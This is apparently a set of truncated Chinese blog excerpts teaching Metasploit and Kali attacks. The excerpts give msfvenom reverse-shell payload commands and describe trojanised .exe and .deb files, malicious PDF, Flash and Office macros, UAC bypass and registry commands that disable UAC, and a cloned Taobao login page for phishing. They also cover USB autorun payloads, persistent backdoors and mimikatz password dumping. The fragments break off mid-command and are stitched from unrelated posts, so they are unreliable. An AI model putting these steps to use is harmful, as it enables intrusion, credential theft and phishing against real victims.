针对Windows 开启侦听 查看payload选项 将1.exe传到网页上 win7访问网页并下载1.exe 下载好之后双击运行,在服务器端就获得了一个shell   针对linux 先获取到一个软件包 在/var/cache/apt/archives目录下查看下载的安装包 将这个安装包拷贝到home目录下,解包到free目录下 创建一个目录 创建control文件 输入以下内容 创建一个postinst文件 输入以下内容 #!/bin/sh sudo chmod 2755 /usr/game…
在无法通过网络边界的情况下转而攻击客户端----进行社会工程学攻击,进而渗透线上业务网络 含有漏洞利用代码的web站点--利用客户端漏洞 含有漏洞利用代码的doc,pdf等文档----诱使被害者执行payload 诱骗被害者执行payload(windows) msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -b "\x00" -e x86/shi…
弱点扫描 根据信息收集的结果搜索漏洞利用模块 结合外部漏洞扫描系统对大IP地址段进行批量扫描 误报率.漏报率 VNC密码破解 客户端渗透 VBScript感染方式 利用  宏  感染word.excel文档 绕过某些基于文件类型检查的安全机制 一般人对word.excel的格式看来是没有安全威胁的,没有防范 生成Payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1…
对普通权限session提权 生成一个木马 开启Apache服务 将木马上传网页 被攻击者从这个网页上获取到这个木马 攻击者开启msf侦听 当被攻击者双击这个木马文件时 攻击者就获取到一个session 进入到这个session 加载priv模块getsystem提权,但是失败了,这是由于win7系统上UAC的限制 后退 使用提权模块ask 使用刚才那个没有提权权限的session 1 exploit 被攻击者就会收到一个对话框,如果点了yes 攻击者就会收到一个session sessions…
这个漏洞利用只在XP上有效 利用pdf漏洞利用payload exploit生成一个pdf文件 传到被攻击机上 启动msf侦听 exploit -j XP上双击运行这个pdf时,kali获取到一个shell 构造恶意网站 exploit 生成一个网站 被攻击者点到这个网站时 攻击机就获得了一个session 提权 开启键盘记录,结果记录到以下文件中 利用flash插件漏洞执行payload 要满足这样一个条件 生成一个服务 当被攻击者点开这个网址 攻击者就收到了一个shell 类似的攻击模块还有…
跳板 假设有这样一个场景,有一个局域网内网网关是1.1.1.1,局域网里的主机1是kali,它经过一个防火墙连接到公网,主机2和主机3在另一个内网网关为2.1.1.1的局域网,由于防火墙做了设置,只有主机2可以通过防火墙连接到公网,主机3无法通过防火墙连接到公网,但是主机2和主机3是互联的.两个局域网可以通过公网的路由相互连接. 防火墙1设置了端口映射规则,将防火墙的4444端口映射到主机1的4444端口,当主机1侦听本机的4444端口时相当于侦听防火墙的4444端口 主机1已经获得了主机2的s…
如果一个网页存在可以include外链的漏洞,我们可以利用这个漏洞include本机上的文件,从而获取web服务器的shell. 设置目标的IP 根据网页的路径设置参数 设置cookie 选择payload 设置本地IP exploit获取session…
关闭UAC 如果你获得一个system权限的session 进入到这个session 进入到shell 依次输入以下命令 cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTW…
启动社会工程学攻击组件 生成二维码攻击模块 输入你想生成二维码的url,这里做演示用www.baidu.com 二维码生成后,在这个路径下 生成u盘,DVD的多媒体攻击载荷 通过修改autorun.inf这个文件,当被攻击主机读取U盘.DVD的设备时,注入攻击载荷. 克隆网站 1232 设置kali本机的IP 设置想要克隆的页面URL地址 在本机启动Apache服务 这样就克隆成功了, 克隆的页面存放在 当在页面输入192.168.21.31时进入的是淘宝的页面 当在这个页面输入用户名密码点登陆…
持续后门 先获取一个session 在目标主机上生成持续后门 设置侦听参数 启动侦听 重新启动被攻击的主机 一启动攻击者时获取到session mimikatz的使用 mimikatz是俄罗斯组织开发的工具 加载mimikatz help查看命令 msv获取用户名和hash wdigest获取内存中的明文密码信息 kerberos获取内存中的明文密码信息 查看hash 查看bootkey 查看被攻击主机上运行的进程 查看被攻击主机上运行的服务 查看被攻击主机的加密条件 PHP shell 生成一…